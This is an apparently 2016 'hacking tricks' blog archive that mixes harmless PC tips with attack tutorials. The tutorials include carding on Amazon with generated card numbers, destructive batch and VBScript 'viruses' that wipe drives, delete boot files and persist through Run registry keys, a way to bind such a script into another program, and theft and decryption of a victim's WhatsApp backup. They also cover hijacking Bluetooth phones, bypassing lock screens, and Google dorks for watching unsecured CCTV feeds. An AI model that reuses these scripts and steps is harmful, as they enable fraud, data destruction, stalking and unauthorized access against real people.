Wednesday 3 August 2016

can u see it i passed a ethical hacking exam from 95 percent just two mistakes only


Saturday 2 July 2016

Way To Increase Internet Speed by 20-30%


  1.  Click Start->Run->gpedit.msc (in windows 7) and ::click start and type gpedit.msc (in windows 8).
  2. This opens the registry policy editor.
  3.  Then goto ->Local Computer Policy ->Computer Configuration ->Administrator Template ->Network -> Qos Packet Scheduler -> Limit reservable Bandwidth
  4. Double click on Limit reservable Bandwidth It will say it is not configured, but the truth is under the Explain tab i.e. By default packet scheduler limits the  by 20 % of the bandwidth of theconnection but use the setting to override the default.
So the trick How To Increase Internet Speed by 20-30% is to Enable the reserve bandwith, then set it to ZERO. this will enable the system to reserve nothing rather than the reserved 20%, It will works on Win XP as  well. And with this use will boost up intrenet speed and browser faster on computer network.

Friday 10 June 2016

How to Resume Internet Download Manager Expired and Broken Download


How to Resume Internet Download Manager Expired and Broken Download




IDM(Internet download manager) is a popular download management utility which is world's fastest downloading tool.It accelerate your downloading speed upto 5 times.It is an excellent to use your internet efficiently,that it use your internet connection's speed up to maximum and also provides control over your files.You have control over pausing,resuming,schedule and you can resume downloading files even from unexpected power loss and network problems.
Idm has simple graphical user interface that makes it easy to use for both beginners and professionals.



Before doing Step below make sure your browser has  IDM Integration Extension and updated.





DOWNLOAD Latest IDM
https://www.facebook.com/download/877575515660185/IDM%20623%20Build%2018%20Crack%20BMT.rar?


You can learn How To Resume Broken and Expired Downloads through below steps.
  This trick is in build in internet download manager.You have do the following
1.)    Open Internet Download Manager and Right click on the broken file
    Select Refresh Download Address.



2.)    A new window will open and on your browser will redirect to the download location.  " IDM is waiting for new address"
    After getting the download link address click on OK or YES to start.


3.)  You can now resume your download...  It Resumes your Download.. 



Note:This trick is doesn't work in all occasion. So i prefer you to choose the method 2


 This works than method 1.This can done in two ways and method 2 has two sub sections.
1.)    Open your Internet Download Manager and right click on the download file.click on properties.
 Copy the address in the Referer field and paste it in your browser.



  
2.)    Then click to download it.Then in IDM's dialog window click on download later.



3.) Then goto IDM Dashboard and get new address by clicking its properties, copy the address in address field.



4.)    Paste the new address in broken file's address field.



 5.)   Now click resume to continue your file downloading.












 











 












.

Tuesday 31 May 2016

how to hack amazon and buy anything (iphone 6)

Hlw guys m pratyush today m gonna fulfill ur dream by teaching u carding amazon its really really simple m gonna take iPhone 6 to buy product


📝 note : This tutorial is for educational purposes only try at your own risk because its totally illegal and we don't support illegal things we are not responsible for this.
We believe in security....


So lets start
1) open amazon.com (not the indian site because in India there is tight security)
2) Then search iPhone 6 and select ur like 👍 and add it to cart
3) While it Is added to cart we will go to www.getcreditcardnumbers.com
4)copy any number
5) login to ur acc in amzon
6)ship to ur address
7) now write any name and paste the number
8) now wait for ur order :-):-):-)

Saturday 28 May 2016

how to make a beep virus in computer whenever anyone opens it

Hello guys....!
when I surfing the net........I had seen that we can make a beep sound with cmd.......!
so that I thought that we can make virus by batch file ....!
actually this is not a virus,,,,,,,,,but it annoys you by a beep sound...........!



Step 1: Coding

step1:-

go to cmd and navigate to local disk D and type as below


echo ctrl+g > beep.bat

step 2:-

then right click and edit that batch file

there we can find only dot (.)

step 3:-

then add the first and bottom code lines to it .........like

:v

.

goto v

and then save it...

Step 2: Hiding the virus

we don't need to advertise that we had make a virus....!

converting the batch to exe.........!

now you will need a software "batch to exe converter".....

we are not only converting the .bat file to .exe file ....we are also changing its mode to invisible mode.... you just gonna do is select the batch file as a input and specify the output file.... then check the invisible application option in the visibility tab....

Step 3: Binding virus and any exe application

In this step we need another software "Easy Binder"......which is used to bind multiple files together.....
Then select any other useful,often used software....
After that open Easy Binder software....
then add both the files... then select the icon (any)...
you can download the icon file from the internet...
then click on bind files...
then your virus file is created now....

Step 4: How it works.....

when it is executed it creates a continuous beep sound..........which annoys users...!
so I named it as beep virus....
when we hit ctrl+g command in cmd......we can hear a beep sound......
so I make this virus by looping that command .........!
actually It does not do any harm to ur pc.....you may recover from this by restart or logoff....

Friday 27 May 2016

Learn All Mobiles Hacking Tips Tricks Cheats Step by Step

Learn All Mobiles Hacking Tips Tricks Cheats Step by Step
Here is a list of what you can do when you have hacked the other phone. Have Fun!
•    Read Messages. (They are no more personal!)
•    Read Contacts. (Check your lover’s phone book to see what name he/she has saved your name. Hey, please don’t suicide when you see he/she has saved your number as lover no. 9! HeHe)
•    Change Profile (Change the other’s profile to silent mode when you are on a date!)
•    Play Ring tone even if the phone is silent (Annoy your classmates!)
•    Play songs from the hacked phone in the same phone.
•    Restart the phone (Show some magic to your friends!)
•    Switch off the phone (Ultimate thing that you can do!)
•    Restore Factory Settings (Do this to the most organized one and run away quickly!)
•    Change Ringing Volume (You have enough experience how to use it. Don’t you?)




Follow these steps to hack any Blue tooth enabled mobile phone.
     Download Super Blue tooth Hack 1.8 and http://adf.ly/ZshL5 check that your mobile is in the list of supported handsets from the link provided. After you have downloaded the .jar file, install it in your mobile.
     There is no need to install the software in the mobile which you want to hack.
     Turn on the Blue tooth of your handset and open the Super Blue tooth Hack Application.
     Select the connect option and then Enquiry Devices to search for any of mobile that has its Blue tooth turned on nearby.
     Your friend’s Blue tooth must also be turned on to be found. Pairing between the devices is also necessary sometimes.
     Once your friend’s phone has been found, try out its functions!
    
    
• Nokia Mobile (Symbian / Android) press (*#9990#) , Now your Blue tooth will always active until your mobile can't restart .


How to disable a STOLEN mobile phone?
 To check your Mobile phone's serial number, key in the following digits on your phone:
*#06#
 A 15 digit code will appear on the screen.
 This number is unique to your
 ... handset. Write it down and keep it somewhere safe. when your phone get stolen, you can phone your service provider
 and give them this code.
 They will then be able to block your handset so even if the thief changes the SIM card, your phone will be totally useless.
 You probably won't get your phone back,
 but at least you know that
 whoever stole it can't use/sell it either. If everybody does this, there would be no point in people stealing mobile phone..........
•Nokia Mobiles Tips Tricks Cheats updated info
Android Secret Dial Codes List
 All the codes are listed below. To use, simply go to your phone app and dial these codes.
•*#*#4636#*#* – Phone Information (allowsyou to change the SMSservice centrenumber and more)
•*2767*3855# – Factory Reset Phone
•*#*#34971539#*#* – Shows completes information about the camera
•*#*#7594#*#* – Changing the power button behavior – Enables direct power off once the code enabled
•*#*#273283*255*663282*#*#* – For a quick backup to all your media files
•*#*#197328640#*#* – Enabling test mode for service activity
•*#*#232339#*#* or *#*#526#*#* or *#*#528#*#* – Wireless LAN Tests
•*#*#232338#*#* – Displays Wi-Fi Mac- address
•*#*#1472365#*#* – For a quick GPS test
•*#*#1575#*#* – A Different type GPS test
•*#*#0283#*#* – Packet Loopback test
•*#*#0*#*#* – LCD display test
•*#*#0673#*#* or *#*#0289#*#* – Audio test
•*#*#0842#*#* – Vibration and Backlight test
◦*#*#2663#*#* – Displays touch-screen version
◦*#*#2664#*#* – Touch-Screen test
◦*#*#0588#*#* – Proximity sensor test
◦*#*#3264#*#* – Ram version
◦*#*#232331#*#* – Bluetooth test
◦*#*#7262626#*#* – Field test
◦*#*#232337#*#* – Displays bluetooth device address
◦*#*#8255#*#* – For Google Talk service monitoring
◦*#*#4986*2650468#*#* – PDA, Phone, Hardware, RF Call Date firmware info
◦*#*#1234#*#* – PDA and Phone firmware info
◦*#*#1111#*#* – FTA Software version
◦*#*#2222#*#* – FTA Hardware verion
◦*#*#44336#*#* – Displays Build time and change list number
◦*#06# – Displays IMEI number
◦*#*#8351#*#* – Enables voice dialing logging mode
◦*#*#8350#*#* – Disables voice dialing logging mode
◦**05***# – Execute from Emergency dial screen to unlock PUK code


Secret Code For Nokia

Codes :
•*#06# For checking IMEI(international Mobile Equipment Identity)
• *#7780# Reset to factory settings
•*#0000# To view software version
•*#2820# Bluetooth device address
•*#746025625# Sim clock allowed status
•#pw+1234567890+1# Shows if ur sim as any restrictions
•*3370# This Nokia code activates Enhanced Full Rate Codec (EFR) - Your Nokia cell phone uses the best sound quality but talk time is reduced my approx. 5%   
•#3370# Deactivate Enhanced Full Rate Codec (EFR) .   
•*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time.   
•*#4720# With this Nokia code you can deactivate the Half Rate Codec.   
•*#0000# Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release   
•*#9999# Phones software version if *#0000# does not work.   
•*#06# For checking the International Mobile Equipment Identity (IMEI Number) .
•    #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
•    #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) .
•    #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols).
•    #pw+1234567890+4# SIM Card Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols) .
•    *#147# This lets you know who called you last (Only vodofone).
•    *#1471# Last call (Only vodofone) .
•    *#21# This phone code allows you to check the number that "All Calls" are diverted to.
•    *#2640# Displays phone security code in use .
•    *#30# Lets you see the private number.
•    *#43# Allows you to check the "Call Waiting" status of your cell phone.
•    *#61# Allows you to check the number that "On No Reply" calls are diverted to .
•    *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to .
•    *#67# Allows you to check the number that "On Busy Calls" are diverted to
•    *#67705646# Phone code that removes operator logo on 3310 & 3330
•    *#73# Reset phone timers and game scores.
•    *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM

Clock Stop Allowed", it means you will get the best standby time possible .
•    *#7760# Manufactures code.
•    *#7780# Restore factory settings.
•    *#8110# Software version for the nokia 8110.
•    *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again.
•    *#94870345123456789# Deactivate the PWM-Mem.
•    **21*number# Turn on "All Calls" diverting to the phone number entered.
•    **61*number# Turn on "No Reply" diverting to the phone number entered .
•    **67*number# Turn on "On Busy" diverting to the phone number entered .
•    12345 This is the default security code .
    press and hold # Lets you switch between lines.

Thursday 26 May 2016

How To Disable Mouse


How To Disable Mouse
  1. Open Notepadand copy below codes
rem ---------------------------------
 rem Disable Mouse
 set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
 reg delete %key%
 reg add %key% /v Start /t REG_DWORD /d 4
 rem ---------------------------------
  2. Save this file as  virus.bat
  3. Done you just created your virus.

Wednesday 25 May 2016

How to delete shortcut virus from pendrive/sd card

Steps To Delete Shortcut Virus By Using CMD:
1.Open command prompt (CMD). (Go to Run >> type CMD >> Hit enter )
2.Type the drive letter of your removable device and a colon after it and hit enter. (Eg: g:)
3.Now type: attrib g:*.* /d /s -h -r -s . (Replace g: with the drive name of your drive)
4.Hit enter.

Tuesday 24 May 2016

How to hack whatsapp account



On Daily we have heard news about online services is suffering from a lack of security. In 2016 WhatsApp has been down for nearly four hours,
as if this were not enough, people became aware of the security flaw that allows conversations that should be read by anyone provided it learn properly perform the procedures.

 Steps to follow:


1 - First of all you need to have the device at hand, use the Social Engineering and be quick in getting the e-mail and backup files msgstore-2014-05-02.1.db.crypt5.
To get the email for this follow the procedures below.




Enter the Play Store and view the e-mail, or write down mentalize somewhere without the person noticing.










Now Go to the device settings from Settings -> Accounts & Sync, look for the email from Google and mentalize or write down somewhere without the person noticing.












2 - Now let's take the msgstore-2014-05-08.1.db.crypt7 file To do this, use Polaris Office or any other app that allows you to navigate between folders and manage files.





Follow this path: My files -> WhatsApp -> Databases - In this directory you will find all the backup files of your messenger.
When you do find the file sharing for your mobile phone via bluetooth.
















3 - Have we got the e-mail and file backup http://whatcrypt.com/?cmd=_decrypt
we enter the site and send the backup file.
To Submit follows:
Account: Enter the email of the victim
Database: Select the database backup
Click Process / download zip
Save the zip file on your desktop










4 - Once you have downloaded the backup file in zip format we now need to download the tool to extract the backup and we have access to conversations. Save on the desktop.










WhatsApp Decrypt MediaFire: http://www.mediafire.com/download/hw7m1590ld27vd5/WhatsApp_Decrypt.rar



Scanner Virus Total: https://www.virustotal.com/pt/file/c58bbef257e1ada303478b468a2b68523cbd307e1620d76d53489763e0ef5e15/analysis/1399523236/







5 - From the desktop to extract the file WhatsApp Decrypt.zip install python-3.4.0 folder and enter the WhatsApp.
Browse by: WhatsApp -> Whatsapp_Xtract_V2.1_2012-05-10-2












When you install python-3.4.0 do the following steps:



1 - Go to My Computer, click with the right mouse button and Properties -> Advanced System Settings



2 - In the System Properties navigate to the Advanced tab -> Environment Variables



3 - Environment Variables look for Path



4 - Edit the PATH



5 - At the end of PATH add ;C:\Python34
6 - Click ok and close








6 - Now extract the file from step 3 msgstore_decrypted on the desktop, copy and paste it on WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 and replace the file
















7 - Replace the WhatsApp folder -> Whatsapp_Xtract_V2.1_2012-05-10-2 from step 5 and
look for msgstore.dll file, drag it onto the whatsapp_xtract_drag'n'drop_database file (s) _here












After you drag it will create a file called msgstore.db.html the folder and ask you to press any key at the command prompt to continue ...
Pressing any key it will open in your default browser displaying the file msgstore.db.html all conversations, dates, numbers, etc...













Note: In step 2 print shows the crypt 7 but the crypt is correct 5!

 Disclaimer: This tutorial is educational purpose only. hackingtricksalert.blogspot.com is not responsible for any kind of illegal activities. We believe in Security.

Monday 23 May 2016

Facebook tricks (working)


Facebook tricks


How To Trace Your Facebook Profile Visitors

Now here we found who recently visited your profile.
Follow below steps for get to know your FB recent visitors.

Step 1) Go to your Facebook Profile Page.
Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.
Step 3) Now press Ctrl + F from your keyboard to open search box.
Step 4) Now search this code {"list":
Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.




Step 6) There are some Facebook Profile Ids of your friends who visited recently.
Step 7) The first one ID's are showing visits the most number of time.
Step 8) Now if your want to findout, Open a new tab Enter below link :
www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992988


Enjoy The Trick.. :)


 AVOID FRIEND REQUEST BLOCK
 We usually send friend requests and if it's not accepted it is kept in pending.
If there are lots of pending requests it may lead to block.
So this is a simple way to get those requests cancelled and protect your account from being blocked.
 Follow below steps :-
 1. Go to account settings.
 2. Select `download a copy` option.





 3. Choose `expanded archive` from the next page opened and enter your password and click continue.
 4. Select `start my archive`.
 5. After a few hours you'll get the download link in your email.
 5. Download the file `facebook` and unzip it.
 6. Open the folder html and then `friend_requests.htm­l`.
 7. You can see the list of your friend requests and pending lists.
 Now goto their accounts and click`cancel request.
 That's all You are done now. Your account is safe.

Sunday 22 May 2016

How to bypass android lock


Bypass Android Pattern lock


hackingtricksalert.blogspot.com


METHOD I
Solution For Everyone With Recovery (Cwm, Twrp, Xrec,Etc...) Installed:
INSTRUCTIONS:
1. Download this zip Pattern Password Disable (Download from attachments) on to your sdcard
(using your PC, as you cant get into your phone, right )
2. Insert the sdcard into your phone
3. Reboot into recovery mode
4. Flash the zip
5. Reboot
6. Done!

Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.


METHOD 2
Solution For Everyone Without Recovery Installed - ADB :

What You Need:
=>A computer running a Linux distro or Windows+Cygwin
=>USB cable to connect your phone to the PC
=>Adb installed

How to install adb:
1. Open Terminal
2. Type:

Code:
"sudo apt-get install android-tools-adb"


-> Hit [Enter]
3. Follow the instructions until everything is installed.



INSTRUCTIONS:
1. Connect you (turned on) Phone to the Computer via USB.
2. Open a terminal window.
3. Type:
Code:
adb devices
adb shell
cd data/system
su
rm *.key
4. Done...Now You Just Have To Reboot.
Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.


METHOD 3
Solution For Everyone Before Lock Accident :
SMS Bypass - Download Link - Install It On Your Device (Download from attachments)
This App Allows You To Remotely Bypass Your Phone's Screen Lock By Sending A SMS.
It Removes Your Gesture Pattern Or Password After Receiving A Preset Keyword Along With A Secret Code Via SMS.
SMS Bypass App Requires Root.
INSTRUCTIONS:
1.First, make sure you give permanent root access to the app.
2.Change the secret code to your preferred choice. The default password is : 1234
3.To reset your screen lock, send the following message from another phone:
Code:
secret_code reset
Example:
Code:
1234 reset
Note 1 : There is a space between your secret code and reset. Also the secret code is case sensitive.
Note 2 : There is an option available to change the preset keyword. Default is : reset - Your phone will restart and your lock screen will be reset.
Note 3 : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.


METHOD 4
Solution For Everyone Via Adb - SQL Command :
INSTRUCTIONS:
=>Type This Commands Separated In Your Terminal (CMD Prompt) :
Code:
adb shell
cd /data/data/com.android.providers.settings/databases
sqlite3 settings.db
update system set value=0 where name='lock_pattern_autolock';
update system set value=0 where name='lockscreen.lockedoutpermanently';
.quit
=>Now You Just Have To Reboot.
Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 5
Solution For Everyone Via Adb - File Removal :
INSTRUCTIONS:
=>Type This Command In Your Terminal (CMD Prompt) :
Code:
adb shell rm /data/system/gesture.key
Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.


METHOD 6
Solution For Everyone With USB Debugging Enabled :
INSTRUCTIONS:
Primary Step for all method:
 Download & Extract to anywhere - Bypass Security Hack (Download from attachments)
 Open SQLite Database Browser 2.0.exe in SQLite Database Browser.
 Run pull settings.db.cmd inside By-pass security Hacks folder to pull out the setting file out of your phone.
 Drag settings.db and drop to SQLite Database Browser 2.0.exe program.
 Navigate to Browse data tab, At table there, click to list down the selection & selete secure

Instruction To Remove Pattern Lock:
 Now, find lock_pattern_autolock, Delete Record
 Close & save database
 Run push settings.db.cmd and reboot your phone

Instruction To Remove PIN Lock:
 Now, Find Or Create lockscreen.password_type, double-click & change it's value to 65536, Apply changes!
 Now, find lock_pattern_autolock, Delete Record, If doesn't exist, Ignore
 Close & save database
 Run push settings.db.cmd and reboot your phone

Instruction To Remove Password Lock:
 Now, find lockscreen.password_salt, Delete Record
 Now, find lockscreen.password_type, Delete Record
 Close & save database
 Run push settings.db.cmd and reboot your phone

Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry. Just Try Any Random Pattern Or Password And it Should Unlock.

METHOD 7
Solution For Everyone With Recovery Installed :
INSTRUCTIONS:
1.Download and Copy Aroma File manager.zip (Download from attachments) to your memory card.
2. Open your recovery (press volume Down + Power button or it can be different according to the phones.
Generally the phones who have press able button on the middle they have to press all three buttons. Google for you pattern there are lots)
3. There’ll b an option in recovery called “mount”. Go in that option and then mount all the cache and everything it is there.
4. Then select “update” and select “apply update from SD/external” and select aroma file manger.zip file that you downloaded using above QR code above.
5. After Flashing or updating, the aroma file manger will open. Use volume keys for up/down and power button 2 select like you use to get into recovery.
6. In aroma File manager , Go to menu , which is located in bottom strip and then select Settings.
7. Go to bottom n select “mount all partition in startup ” then exit from aroma file manger.
8. Now after exit , re-update that aroma file again and it will open again.
9. Go to data >> and then System.
Then find ‘gesture.key’ (for pattern lock) and ’password.key’ (for password lock) then
 long touch on gesture.key or password.key and sum option will be prompted , choose delete and delete that file and restart.
Note : If You See The Gesture Pattern Grid Or Password After Restarting, Don't Worry.
Just Try Any Random Pattern Or Password And it Should Unlock.

Anonymous surfing


To Protect Your Privacy..!!
HOLA VPN

Hola is a peer to peer network that provides everyone on the planet with freedom to
access all of the Web! It works through the community of its users - Hola users help you
to access the web.


JonDo

JonDos publishes a new version of the JonDo-Software, an IP changer and IP anonymizationprogram, that you can use for anonymous surfing in the Internet with high security anonymous proxy servers.

What is JonDo?
 
JonDo is an open source and free-of-charge program for Windows, Linux and MacOS X.
It hides the user's IP adress behind an anonymous IP address. In contrast to other anonymizers (VPNs, anonymous proxy servers), the user's anonymity stays protected even against the providers (operators) of the anonymous IP address.


PhotobucketDownload 


TOR



Tor is very useful for online anonymity, its protect your privacy, defend against a form
of network traffic analysis. Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic
allows others to track your behavior and interests.


Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create
new communication tools with built-in privacy features. 


Tor to keep websites from tracking them and their family members, or to connect to
news sites, instant messaging services, or the like when these are blocked by their
local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. 


Video Tutorial:

PhotobucketDownload 
Tortilla

It is an open source tools that allows users to securely, anonymously, and transparently route all TCP/IP and DNS traffic through Tor, regardless of the client software, and without relying on VPNs or additional hardware or virtual machines. 


PhotobucketDownload


ProXPN



ProXPN helps to upgrades your internet connection with VPN encryption secures all types of connections from DSL and cable to 3G gives you 100% private access to the internet get an IP address in the USA, UK, or NL.
It Protects websites you visit, hijack your passwords, credit cards, or banking details intercept and spy on your email, IMs, calls, or anything else, record your web,history, run traces to find out where you live.

Video Tutorial:

PhotobucketDownload 

UltraVPN - A Free VPN

UltraVPN is a simple user interface to connect or disconnect to our VPN servers.

To use UltraVPN, you need to right click on a traybar icon (on the bottom right of your screen) that looks like a computer with a red screen. After right clicking on it, choose "connect". 

It can be used by any individual who simply wants to protect his privacy, either on a LAN or a public hotspot.

Features:
You can connect or log in into MSN if it's blocked.
For use VoIP software like Skype if it's blocked.
UltraVPN protect your email and browsing privacy.

How can you download UltraVPN?
Download the software client and create account. You are now able to connect to the VPN. 

Video Tutorial:

How to make virus by notepad

How   to   make  virus   by   notepad

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having  .vbs Extension .


2 -> Virus Creation Trick  2 .
Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.

Now double click on this .bat file to run Command Prompt.


 3 -> Virus Creation Trick 3
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.


4 -> Virus Creation Trick 4
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop


Save it as "Anything.VBS" and send it.


5 -> Virus Creation Trick 5
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.  



6 -> Virus Creation Trick 6
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat




7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat

 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 
12 -> Virus Creation Trick 12
Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

 
13 -> Virus Creation Trick 13
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How to hack cctv camera from google search

How  to   hack   cctv   camera   from  google  search

Security cameras are everywhere, it seems, but what are they looking at? How much of our comings and goings do they capture?
If you have ever been curious about it, we will show you not only how to see through the eyes of Big Brother, but even how you can sometimes zoom, pan, tilt, capture, and save images right from your computer! Here is a guide to watch security camera streams on the internet.
Picture
1 Open up your web browser. This will be your portal into an entire world of closed circuit television (CCTV) cameras wired to the internet.
Picture
Search one of the queries listed below under the "search queries" heading.This list is ever evolving so if one search query does not work, try another until you see results.
Picture
Investigate the results. After you Google one of these queries, you will see thousands of search results. Click on any one of them. If the link is still active you might see a page filled with thumbnails of security camera images. These images are usually click-able links. In other cases, you might just see the screen of a single camera.
  • You may be asked for a password. If you are an authorized user, you will have it at hand. If not, you'll have to use your imagination. Keep in mind: If you have to break through an existing log in system, it's most likely illegal and certainly unethical.
Picture
4 Manipulate the camera. Depending on the type of camera that you have access to, you may be able to zoom, pan, and tilt the camera.
Picture
Be aware that you may be tracked while using the site. Do not repeatedly maintain connections to a feed for more than 30 minutes. Administrators review the access logs for the devices on a regular basis.
  • Many administrators will disregard brief attempts to access low importance devices when no harmful use is found. However, long periods of monitoring could attract suspicion and may cause your access IP address to be reported to authorities.

Search   queries

Picture
The list is continuously evolving so if you find a query that doesn't work, edit this page and remove it from the list.
  • inurl:/view.shtml
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:view/index.shtml
  • inurl:view/view.shtml
  • liveapplet
  • intitle:”live view” intitle:axis
  • intitle:liveapplet
  • allintitle:”Network Camera NetworkCamera”
  • intitle:axis intitle:”video server”
  • intitle:liveapplet inurl:LvAppl
  • intitle:”EvoCam” inurl:”webcam.html”
  • intitle:”Live NetSnap Cam-Server feed”
  • intitle:”Live View / - AXIS 206M”
  • intitle:”Live View / - AXIS 206W”
  • intitle:”Live View / - AXIS 210″
  • inurl:indexFrame.shtml Axis
  • intitle:start inurl:cgistart
  • intitle:”WJ-NT104 Main Page”
  • intitle:snc-z20 inurl:home/
  • intitle:snc-cs3 inurl:home/
  • intitle:snc-rz30 inurl:home/
  • intitle:”sony network camera snc-p1″
  • intitle:”sony network camera snc-m1″
  • intitle:”Toshiba Network Camera” user login
  • intitle:”i-Catcher Console - Web Monitor”

How to find IP ?

In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?
1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
Picture
3. It will take less then a second and come up with the results as shown below.
Picture
